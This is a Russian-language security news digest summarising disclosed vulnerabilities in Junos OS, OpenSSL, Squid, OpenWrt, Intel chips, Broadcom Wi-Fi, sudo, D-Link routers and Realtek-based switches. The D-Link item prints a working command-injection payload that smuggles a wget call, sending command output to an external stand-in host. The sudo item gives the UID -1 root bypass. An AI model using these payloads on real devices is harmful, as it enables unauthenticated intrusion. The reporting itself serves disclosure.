Розділи сайту Всі
#security
Эксплуатация проблем позволяет вводить команды в httpd.log, получать права доступа или токены сеансов J-Web.

Производитель телекоммуникационного оборудования для интернет-провайдеров, корпораций и государственного сектора Juniper Networks выпустил внеплановое обновление безопасности для операционной системы Junos OS, исправляющее несколько проблем в web-сервисах и интерфейсе J-Web, объединенных под одним идентификатором CVE (CVE-2020-1631). Эксплуатация проблем позволяет злоумышленнику вводить команды в httpd.log, читать файлы с разрешением на чтение «world» или получать токены сеансов J-Web.

Как сообщила компания, наиболее опасной является проблема, связаннная с токеном сеанса J-Web, получившая оценку в 8,8 балла по шкале CVSS. Если J-Web включен на устройстве, злоумышленник может получить тот же уровень доступа, что и любой авторизованный пользователь (например, права администратора).

Другая проблема затрагивает версии Junos OS 19.3R1 и старше, ее эксплуатация позволяет неавторизованному злоумышленнику прочитать файл конфигурации.

Эксплуатация третьей проблемы позволяет злоумышленнику вводить команды в httpd.log. Однако влияние данной проблемы более ограничено, поскольку служба HTTP имеет права как у пользователя «nobody».

Уязвимость не затрагивает устройства под управлением Junos OS с отключенными сервисами HTTP/HTTPS, но содержится в следующих версиях ОС: 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, и 20.1. Сетевым администраторам рекомендуется обновить уязвимые устройства до последних версий программного обеспечения.
Доступен корректирующий выпуск криптографической библиотеки OpenSSL 1.1.1g, в котором устранена уязвимость (CVE-2020-1967), приводящая к отказу в обслуживании при попытке согласовать соединение TLS 1.3 с подконтрольным злоумышленнику сервером или клиентом. Уязвимости присвоен высокий уровень опасности.

Проблема проявляется только в приложениях, использующих функцию SSL_check_chain(), и приводит к краху процесса при некорректном использовании TLS-расширения "signature_algorithms_cert". В частности, при получении в процессе согласования соединения неподдерживаемого или неверного значения алгоритма обработки цифровых подписей возникает разыменование нулевого указателя и крах процесса. Проблема проявляется начиная с выпуска OpenSSL 1.1.1d.

https://www.mail-archive.com/openssl-announce@openssl.org/msg00320.html
Раскрыты сведения об уязвимостях в прокси-сервере Squid, которые без лишней огласки были устранены ещё в прошлом году в выпуске Squid 4.8. Проблемы присутствуют в коде обработки блока "@" в начале URL ("user@host") и позволяют обойти правила ограничения доступа, отравить содержимое кэша и совершать атаку с использованием межсайтового скриптинга.

CVE-2019-12524 - клиент при помощи специально оформленного URL может обойти правила, заданные при помощи директивы url_regex, и получить конфиденциальные сведения о прокси и обрабатываемом трафике (получить доступ к интерфейсу Cache Manager).

CVE-2019-12520 - через манипуляцию с данными об имени пользователя в URL можно добиться сохранения в кэше фиктивного содержимого для определённой страницы, что например, может использоваться для организации выполнения своего JavaScript-кода в контексте других сайтов.
Обнаружены уязвимости в протоколах PPPoE, DHCPv4/DHCPv6.

На данный момент добавлен патч устраняющий уязвимости для PPPoE и IPoE

Рекомендуется обновить accel-ppp из репозитория организации https://github.com/accel-ppp/accel-ppp

Документация https://accel-ppp.readthedocs.io/en/latest/installation/install.html

В гите можно просмотреть обновления. Судя по последним коммитам - это:
Для PPPoE
Check for length in pppoe tags
Для IPoE
dhcpv4/dhcpv6: improve packet validation
Уязвимость CVE-2020-7982 существует в менеджере пакетов OPKG в OpenWrt.

Специалист компании ForAllSecure Гвидо Вранкен (Guido Vranken) опубликовал подробности о ранее обнаруженной им критической уязвимости в OpenWrt.

Уязвимость CVE-2020-7982 существует в менеджере пакетов OPKG в OpenWrt из-за механизма проверки целостности загруженных пакетов с помощью контрольных сумм SHA-256, встроенных в индекс репозитория.

В процессе выполнения команды opkg install на системе жертвы злоумышленник может осуществить атаку «человек посередине». Атакующий может перехватывать передаваемые данные с целью удаленного выполнения произвольного кода, обманом заставив систему установить вредоносный пакет или вредоносное обновление ПО без соответствующей проверки.
Компания Intel поблагодарила экспертов Positive Technologies, обнаруживших уязвимость в подсистеме Intel CSME . Ошибка присутствует в большинстве чипсетов Intel, выпущенных за последние пять лет.

Эксплуатируя уязвимость CVE-2019-0090, локальный злоумышленник может извлечь корневой ключ платформы (chipset key), который записан в микросхеме PСH, и получить доступ к зашифрованным этим ключом данным. При этом невозможно зафиксировать сам факт утечки ключа. Имея корневой ключ, злоумышленник может не только расшифровывать данные, хранящиеся на целевом компьютере, но и подделать его аттестацию, которая основана на схеме EPID (Enhanced Privacy ID), — то есть выдать свой компьютер за ПК жертвы. Данная схема используется в работе технологии DRM, а также для обеспечения безопасности банковских транзакций и аттестации интернета вещей.
Риску атак подвержены продукты Amazon, Apple, Google, Samsung, Raspberry, Xiaomi, а также точки доступа от Asus и Huawei.

Исследователи безопасности из компании ESET обнаружили опасную уязвимость (CVE-2019-15126) в широко используемых Wi-Fi-чипах от Broadcom и Cypress. Проблема затрагивает более миллиарда устройств, включая смартфоны, планшеты, ноутбуки, маршрутизаторы и IoT-устройства. Уязвимость получила название Kr00k и ее эксплуатация позволяет находящимся поблизости удаленным злоумышленникам перехватывать и дешифровать некоторые беспроводные сетевые пакеты, передаваемые уязвимым устройством.

Уязвимость затрагивает устройства, использующие протоколы WPA2-Personal или WPA2-Enterprise с алгоритмом шифрования AES-CCMP, но не устройства, использующие протокол WPA3. Для осуществления атаки не требуется подключение к беспроводной сети. По словам специалистов, риску атак подвержены продукты Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy), Raspberry (Pi 3), Xiaomi (RedMi), а также точки доступа от Asus и Huawei.
Компания Intel исправила 13 уязвимостей в прошивке своих контроллеров управления материнской платой (BMC), используемых в продуктах Intel Server. 12 из них были выявлены специалистами Intel во время внутренних тестирований. Еще одну (CVE-2019-11171) обнаружил исследователь безопасности Даниэль Медина Веласкес (Daniel Medina Velazquez).

На данный момент об уязвимостях известно очень мало. Как сообщает производитель, CVE-2019-11171, описанная как «уязвимость повреждения» кучи, является очень опасной (9 из 10 баллов по шкале оценивания опасности уязвимостей) и позволяет неавторизованному злоумышленнику раскрыть информацию, повысить свои привилегии и/или вызвать отказ в обслуживании.

В общей сложности 13 уязвимостей затрагивают десятки моделей в каждой линейке Server Board, Compute Module и Server System. Во избежание их эксплуатации злоумышленниками настоятельно рекомендуется обновить прошивку BMC-контроллеров до версии 2.18 или более поздних.
В кодовую базу OpenSSH добавлена экспериментальная поддержка двухфакторной аутентификации с использованием устройств, поддерживающих протокол U2F, развиваемый альянсом FIDO. U2F позволяет создавать недорогие аппаратные токены для подтверждения физического присутствия пользователя, взаимодействие с которыми производится через USB, Bluetooth или NFC. Подобные устройства продвигаются в качестве средства для двухфакторной аутентификации на сайтах, уже поддерживаются основными браузерами и выпускаются различными производителями, включая Yubico, Feitian, Thetis и Kensington.

Для взаимодействия с устройствами, подтверждающими присутствие пользователя, в OpenSSH добавлен новый тип ключей "sk-ecdsa-sha2-nistp256@openssh.com" ("ecdsa-sk"), в котором используется алгоритм цифровой подписи ECDSA (Elliptic Curve Digital Signature Algorithm) с эллиптической кривой NIST P-256 и хэшем SHA-256. Процедуры взаимодействия с токенами вынесены в промежуточную библиотеку, которая загружается по аналогии с библиотекой для поддержки PKCS#11 и является обвязкой над библиотекой libfido2, предоставляющей средства для коммуникации с токенами поверх USB (поддерживается протоколы FIDO U2F/CTAP 1 и FIDO 2.0/CTAP 2). Подготовленная разработчиками OpenSSH промежуточная библиотека libsk-libfido2 включена в основной состав libfido2, как и HID-драйвер для OpenBSD.
В утилите Sudo, используемой для организации выполнения команд от имени других пользователей, выявлена уязвимость (CVE-2019-14287), которая позволяет добиться выполнения команд с правами root, при наличии в настройках sudoers правил, в которых в секции проверки идентификатора пользователя после разрешающего ключевого слова "ALL" следует явный запрет запуска с правами root ("... (ALL, !root) ..."). В конфигурациях по умолчанию в дистрибутивах уязвимость не проявляется.

При наличии в sudoers допустимых, но крайне редко встречающихся на практике правил, разрешающих выполнение определённой команды под UID-идентификатором любого пользователя, кроме root, атакующий, имеющий полномочия выполнения данной команды, может обойти установленное ограничение и выполнить команду с правами root. Для обхода ограничения достаточно попытаться выполнить указанною в настройках команду с UID "-1" или "4294967295", что приведёт к её выполнению с UID 0.
В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр
 
ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)
Специалисты Национального института стандартов и технологий США (US National Institute for Standards and Technology, NIST) работают над технологией защиты от перехвата BGP, базирующейся на искусственном интеллекте.

Border Gateway Protocol (BGP) является ключевым протоколом интернета, к сожалению, открытым для злоупотребления. Злоумышленники могут с легкостью заставить сети передавать трафик туда, куда им нужно с целью слежения за пользователями, фишинга и пр. Хотя во многих случаях переадресация трафика происходит случайно из-за технических ошибок, за последние несколько лет злоумышленники не раз злоупотребляли BGP в крупномасштабных атаках.

Утечка маршрутов BGP происходит, когда оператор сети ошибочно объявляет блок IP-адресов другой сети. Проблема заключается в том, что определить, произошел инцидент случайно или кто-то вызвал утечку намеренно, невозможно. Даже если все указывает на злонамеренность, трафик может идти по неверному маршруту в течение нескольких часов, пока ситуация не будет исправлена.
Спустя почти полтора года с момента прошлого выпуска представлен релиз сканера сетевой безопасности Nmap 7.80, предназначенного для проведения аудита сети и выявления активных сетевых сервисов. В состав включено 11 новых NSE-скриптов для обеспечения автоматизации различных действий с Nmap. Обновлены базы сигнатур для определения сетевых приложений и операционных систем.

Последнее время основная работа была сосредоточена на усовершенствовании и стабилизации библиотеки Npcap, развиваемой для платформы Windows в качестве замены WinPcap и использующей современный Windows API для организации захвата пакетов. Много мелких улучшений внесено в движок Nmap Scripting Engine (NSE) и связанные с ним библиотеки. В Nsock и Ncat добавлена поддержка сокетов с адресацией AF_VSOCK, работающих поверх virtio и используемых для взаимодействия между виртуальными машинами и гипервизором. Реализовано определение сервиса adb (Android Debug Bridge), включенного по умолчанию на многих мобильных устройствах.
В коммутаторах на базе чипов RTL83xx, включая Cisco Small Business 220, Zyxel GS1900-24, NETGEAR GS75x, ALLNET ALL-SG8208M и ещё более десятка устройств от менее известных производителей, выявлены критические уязвимости, позволяющие неаутентифицированному атакующему получить контроль над коммутатором. Проблемы вызваны ошибками в SDK Realtek Managed Switch Controller, код из которого использовался при подготовке прошивок.

Первая уязвимость (CVE-2019-1913) затрагивает управляющий web-интерфейс и даёт возможность выполнить свой код с привилегиями пользователя root. Уязвимость вызвана недостаточной проверкой передаваемых пользователем параметров и отсутствием должной оценки границ буфера при чтении входных данных. В результате, атакующий может вызвать переполнение буфера через отправку специально оформленного запроса и эксплуатировать проблему для выполнения своего кода.

Вторая уязвимость (CVE-2019-1912) позволяет без аутентификации загрузить произвольные файлы на коммутатор, в том числе перезаписать файлы с конфигурацией и организовать запуск обратного shell для удалённого входа. Проблема вызвана неполной проверкой полномочий в web-интерфейсе.

Также можно отметить устранение менее опасной уязвимости (CVE-2019-1914), которая позволяет при наличии непривилегированного аутентифицированного входа в web-интерфейс выполнить произвольные команды с привилегиями root. Проблемы устранены в обновлениях прошивок Cisco Small Business 220 (1.1.4.4), Zyxel и NETGEAR. Детальное описание методов эксплуатации планируется опубликовать 20 августа.

Проблемы также проявляются в других устройствах на чипах RTL83xx, но они пока не подтверждены производителями и не исправлены:
  • EnGenius EGS2110P, EWS1200-28TFP, EWS1200-28TFP;
  • PLANET GS-4210-8P2S, GS-4210-24T2;
  • DrayTek VigorSwitch P1100;
  • CERIO CS-2424G-24P;
  • Xhome DownLoop-G24M;
  • Abaniact (INABA) AML2-PS16-17GP L2;
  • Araknis Networks (SnapAV) AN-310-SW-16-POE;
  • EDIMAX GS-5424PLC, GS-5424PLC;
  • Open Mesh OMS24;
  • Pakedgedevice SX-8P;
  • TG-NET P3026M-24POE.
Как завладеть миром, не вызывая подозрения у санитаров. Спасайте ваши лестницы.